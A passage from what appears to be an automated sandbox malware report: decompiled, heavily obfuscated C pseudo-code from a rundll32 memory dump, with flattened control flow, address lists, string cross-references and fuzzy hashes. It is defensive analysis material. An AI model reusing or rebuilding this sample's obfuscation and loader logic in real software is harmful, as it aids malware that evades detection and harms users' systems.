				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E00B3A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00B38C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E00B394DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00B25FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E00B2F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E00B2F536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00B28736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00B28736(0x2000); // executed
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E00B2F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88);
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00B37830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x00b342da
0x00b342e4
0x00b342eb
0x00b342ef
0x00b342f6
0x00b342fd
0x00b34304
0x00b34305
0x00b34306
0x00b3430b
0x00b34316
0x00b34319
0x00b34323
0x00b3432e
0x00b34330
0x00b34338
0x00b3433d
0x00b34342
0x00b34344
0x00b34348
0x00b3434d
0x00b34355
0x00b3435d
0x00b34365
0x00b3436a
0x00b34372
0x00b3437d
0x00b34388
0x00b34393
0x00b3439b
0x00b343a0
0x00b343a8
0x00b343b0
0x00b343b8
0x00b343c3
0x00b343cb
0x00b343d6
0x00b343de
0x00b343ed
0x00b343f0
0x00b343f4
0x00b343fc
0x00b34404
0x00b34409
0x00b34411
0x00b34419
0x00b34421
0x00b34429
0x00b3442e
0x00b34433
0x00b3443b
0x00b34443
0x00b3444b
0x00b34453
0x00b3445b
0x00b34463
0x00b3446e
0x00b34479
0x00b34484
0x00b34494
0x00b3449c
0x00b3449f
0x00b344a3
0x00b344ab
0x00b344b3
0x00b344bb
0x00b344c3
0x00b344cb
0x00b344d6
0x00b344e1
0x00b344ee
0x00b344fd
0x00b34500
0x00b34504
0x00b3450c
0x00b34514
0x00b3451c
0x00b34524
0x00b3452c
0x00b34534
0x00b34541
0x00b34545
0x00b3454d
0x00b34555
0x00b34568
0x00b3456f
0x00b3457a
0x00b34582
0x00b34587
0x00b3458f
0x00b34597
0x00b3459f
0x00b345af
0x00b345b3
0x00b345b8
0x00b345c0
0x00b345c8
0x00b345d4
0x00b345d9
0x00b345df
0x00b345e7
0x00b345f4
0x00b345f5
0x00b345f9
0x00b34601
0x00b34609
0x00b34611
0x00b34616
0x00b3461e
0x00b34629
0x00b34634
0x00b3463f
0x00b34647
0x00b3464f
0x00b34657
0x00b3465f
0x00b34667
0x00b3466f
0x00b34674
0x00b3467c
0x00b3468a
0x00b3468e
0x00b34696
0x00b3469b
0x00b346a3
0x00b346ab
0x00b346b3
0x00b346bb
0x00b346c3
0x00b346cb
0x00b346d0
0x00b346d8
0x00b346e0
0x00b346f0
0x00b346f5
0x00b346fe
0x00b34709
0x00b34714
0x00b3471f
0x00b3472a
0x00b34735
0x00b3473d
0x00b34748
0x00b34750
0x00b34758
0x00b3475d
0x00b34765
0x00b3476d
0x00b34778
0x00b34780
0x00b3478b
0x00b34793
0x00b3479b
0x00b347a3
0x00b347ab
0x00b347b3
0x00b347be
0x00b347c9
0x00b347d4
0x00b347e0
0x00b347e3
0x00b347e7
0x00b347ef
0x00b347f6
0x00b347fa
0x00b347fa
0x00b347ff
0x00b347ff
0x00b34805
0x00000000
0x00000000
0x00b3480b
0x00b3480b
0x00b34939
0x00b3494b
0x00b34950
0x00b34955
0x00b349e0
0x00b349e0
0x00000000
0x00b3495b
0x00b34966
0x00b3496e
0x00b34980
0x00b34984
0x00b34988
0x00000000
0x00b34988
0x00000000
0x00b34811
0x00b34813
0x00b348d7
0x00b348fa
0x00b348fd
0x00b34902
0x00b34a70
0x00b34a70
0x00b34a74
0x00000000
0x00b34819
0x00b3481f
0x00b348a2
0x00b348a9
0x00000000
0x00b34821
0x00b34827
0x00000000
0x00b34aa3
0x00b34833
0x00b34877
0x00b3487c
0x00b34884
0x00000000
0x00b34835
0x00b3483b
0x00b34a79
0x00b34a7f
0x00b34a81
0x00b347ff
0x00b347ff
0x00b34805
0x00000000
0x00000000
0x00000000
0x00b34805
0x00000000
0x00b347ff
0x00b34841
0x00b34850
0x00b34851
0x00b34857
0x00b3485c
0x00b34862
0x00b34868
0x00b3486d
0x00b3486d
0x00b34871
0x00b34871
0x00000000
0x00b34871
0x00b34862
0x00b3483b
0x00b34833
0x00b3481f
0x00b34813
0x00b34aae
0x00b34aae
0x00000000
0x00b34990
0x00b34996
0x00b34a4d
0x00b34a4e
0x00b34a54
0x00b34a59
0x00b34a5f
0x00b34a6b
0x00000000
0x00b34a61
0x00b34a61
0x00000000
0x00b34a61
0x00b3499c
0x00b349a2
0x00b34a10
0x00b34a15
0x00b34a19
0x00b34a1e
0x00b34a25
0x00b34a2e
0x00b34a33
0x00000000
0x00b349a4
0x00b349aa
0x00b349d8
0x00b349dd
0x00000000
0x00b349ac
0x00b349b2
0x00000000
0x00b349b8
0x00b349b8
0x00000000
0x00b349b8
0x00b349b2
0x00b349aa
0x00b349a2
0x00000000
0x00b34996
0x00b347ff

Strings

RESCDIR, xrefs: 00B34852
R.93, xrefs: 00B348F0
+^, xrefs: 00B34463
R.93, xrefs: 00B349A4
l), xrefs: 00B34355
dEH, xrefs: 00B3473D

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +^$R.93$R.93$RESCDIR$dEH$l)
API String ID: 0-1973027218
Opcode ID: 294b2cdd49b489d362fe55a9a898d7335e93e951b01ad7a576ca3362ab33ab2e
Instruction ID: e8d155452e36a7348409b30c4064365ae1a98d1f736391dc962a84760b5fb8f0
Opcode Fuzzy Hash: 294b2cdd49b489d362fe55a9a898d7335e93e951b01ad7a576ca3362ab33ab2e
Instruction Fuzzy Hash: 7E023272508381DFE368CF24C48AA5BBBE1FBC4354F208A1DE5D996260DBB49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B302C3, Relevance: 7.7, Strings: 6, Instructions: 248
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00B302C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E00B2F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E00B3AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E00B2B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00B33E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00B27F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00B34F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}

0x00b302c3
0x00b302c9
0x00b302d3
0x00b302db
0x00b302e9
0x00b302ea
0x00b302ec
0x00b302f1
0x00b302f5
0x00b30305
0x00b3030b
0x00b30313
0x00b3031b
0x00b30323
0x00b30328
0x00b30334
0x00b30339
0x00b3033f
0x00b30347
0x00b3034f
0x00b30354
0x00b30360
0x00b30365
0x00b3036b
0x00b30373
0x00b3037f
0x00b30384
0x00b3038a
0x00b30392
0x00b3039a
0x00b303a3
0x00b303a8
0x00b303ae
0x00b303b6
0x00b303be
0x00b303c6
0x00b303ce
0x00b303d6
0x00b303de
0x00b303e3
0x00b303ef
0x00b303f2
0x00b303f6
0x00b303fe
0x00b30406
0x00b3040b
0x00b30413
0x00b3041b
0x00b30420
0x00b30428
0x00b30430
0x00b30438
0x00b30440
0x00b30448
0x00b30459
0x00b30461
0x00b30465
0x00b3046d
0x00b30475
0x00b30485
0x00b30489
0x00b30496
0x00b30499
0x00b3049d
0x00b304a5
0x00b304b2
0x00b304b6
0x00b304be
0x00b304c6
0x00b304ce
0x00b304d6
0x00b304db
0x00b304e3
0x00b304eb
0x00b304fb
0x00b304ff
0x00b30504
0x00b3050c
0x00b30514
0x00b3051c
0x00b30524
0x00b3052c
0x00b30534
0x00b3053c
0x00b30549
0x00b3054c
0x00b30550
0x00b30554
0x00b3055c
0x00b30564
0x00b30569
0x00b30571
0x00b30579
0x00b3057d
0x00b3058a
0x00b3058e
0x00b30596
0x00b3059e
0x00b305a6
0x00b305ae
0x00b305b6
0x00b305ba
0x00b305bb
0x00b305bd
0x00b305c1
0x00b305c9
0x00b305c9
0x00b305d7
0x00b306f4
0x00b306fd
0x00b30708
0x00b3070f
0x00b30711
0x00b30713
0x00b30719
0x00b3071b
0x00b3071b
0x00b30715
0x00b30715
0x00b30717
0x00000000
0x00000000
0x00b30717
0x00b30713
0x00b305dd
0x00b305e3
0x00b3068a
0x00b3068e
0x00b30692
0x00b30697
0x00b3069a
0x00000000
0x00b305e9
0x00b305ef
0x00b3065f
0x00b30663
0x00b30668
0x00b3066a
0x00b3066d
0x00b30670
0x00b30676
0x00000000
0x00b30676
0x00b305f1
0x00b305f7
0x00b30610
0x00b3061b
0x00b30621
0x00b30622
0x00b30624
0x00b3062a
0x00000000
0x00b3062a
0x00b305f9
0x00b305ff
0x00000000
0x00b30605
0x00b30605
0x00000000
0x00b30605
0x00b305ff
0x00b305f7
0x00b305ef
0x00b305e3
0x00b3071f
0x00b30728
0x00b30728
0x00b306a4
0x00b306be
0x00b306c3
0x00b306c9
0x00b306d0
0x00b306d8
0x00b306d8
0x00b306de
0x00b306e3
0x00b306e6
0x00b306e6
0x00b306e6
0x00000000

Strings

Sq, xrefs: 00B304A5
[, xrefs: 00B303FE
u^, xrefs: 00B30347
#, xrefs: 00B30373
Fj, xrefs: 00B304CE
#,', xrefs: 00B302DB

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #,'$#$Fj$Sq$[$u^
API String ID: 0-3347335214
Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction ID: f173ef07aed9f36b874c43248461ea56e31faadfb8791613698ed95e3559951d
Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction Fuzzy Hash: C3B142725083819FE358CF64C98A40BBBE2FBC5758F108A1DF195562A0D7B99A49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00B2EE78, Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00B2EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E00B2C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00B33E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00B27B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E00B3889D(0xb3c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0xb3ca2c; // 0x505cc8
					_t176 = _t242 + 0x230; // 0x6c0053
					E00B2C680(_t176, _v1064, _v1080, _t218, _v1072,  *0xb3ca2c, _t204,  &_v1040);
					E00B32025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}

0x00b2ee78
0x00b2ee7e
0x00b2ee88
0x00b2ee90
0x00b2ee95
0x00b2eea1
0x00b2eea3
0x00b2eea7
0x00b2eeb6
0x00b2eeb9
0x00b2eec3
0x00b2eec4
0x00b2eeca
0x00b2eed2
0x00b2eeda
0x00b2eedf
0x00b2eee7
0x00b2eeef
0x00b2eef7
0x00b2eeff
0x00b2ef07
0x00b2ef0f
0x00b2ef14
0x00b2ef1c
0x00b2ef24
0x00b2ef33
0x00b2ef37
0x00b2ef3f
0x00b2ef4c
0x00b2ef56
0x00b2ef57
0x00b2ef5d
0x00b2ef65
0x00b2ef74
0x00b2ef78
0x00b2ef80
0x00b2ef88
0x00b2ef8d
0x00b2ef95
0x00b2ef9d
0x00b2efa5
0x00b2efaf
0x00b2efb3
0x00b2efbb
0x00b2efc3
0x00b2efcb
0x00b2efd3
0x00b2efdb
0x00b2efe3
0x00b2efeb
0x00b2eff3
0x00b2effb
0x00b2f003
0x00b2f011
0x00b2f012
0x00b2f016
0x00b2f01e
0x00b2f028
0x00b2f038
0x00b2f03e
0x00b2f04b
0x00b2f055
0x00b2f05d
0x00b2f065
0x00b2f06a
0x00b2f072
0x00b2f07a
0x00b2f082
0x00b2f08a
0x00b2f092
0x00b2f09a
0x00b2f09f
0x00b2f0a7
0x00b2f0af
0x00b2f0bb
0x00b2f0c0
0x00b2f0c6
0x00b2f0ce
0x00b2f0d6
0x00b2f0de
0x00b2f0eb
0x00b2f0ec
0x00b2f0f0
0x00b2f0f8
0x00b2f106
0x00b2f10a
0x00b2f117
0x00b2f11b
0x00b2f123
0x00b2f123
0x00b2f12d
0x00b2f190
0x00000000
0x00b2f12f
0x00b2f135
0x00b2f215
0x00b2f13b
0x00b2f13d
0x00b2f185
0x00b2f18c
0x00000000
0x00b2f13f
0x00b2f13f
0x00b2f145
0x00000000
0x00b2f14b
0x00b2f157
0x00b2f15f
0x00b2f160
0x00b2f16c
0x00b2f16f
0x00000000
0x00b2f16f
0x00b2f145
0x00b2f13d
0x00b2f135
0x00b2f21d
0x00b2f229
0x00b2f229
0x00b2f194
0x00b2f1a1
0x00b2f1a6
0x00b2f1c2
0x00b2f1cc
0x00b2f1d2
0x00b2f1e5
0x00b2f1ea
0x00b2f1ed
0x00b2f1f2
0x00b2f1f2
0x00b2f1f2
0x00000000

Strings

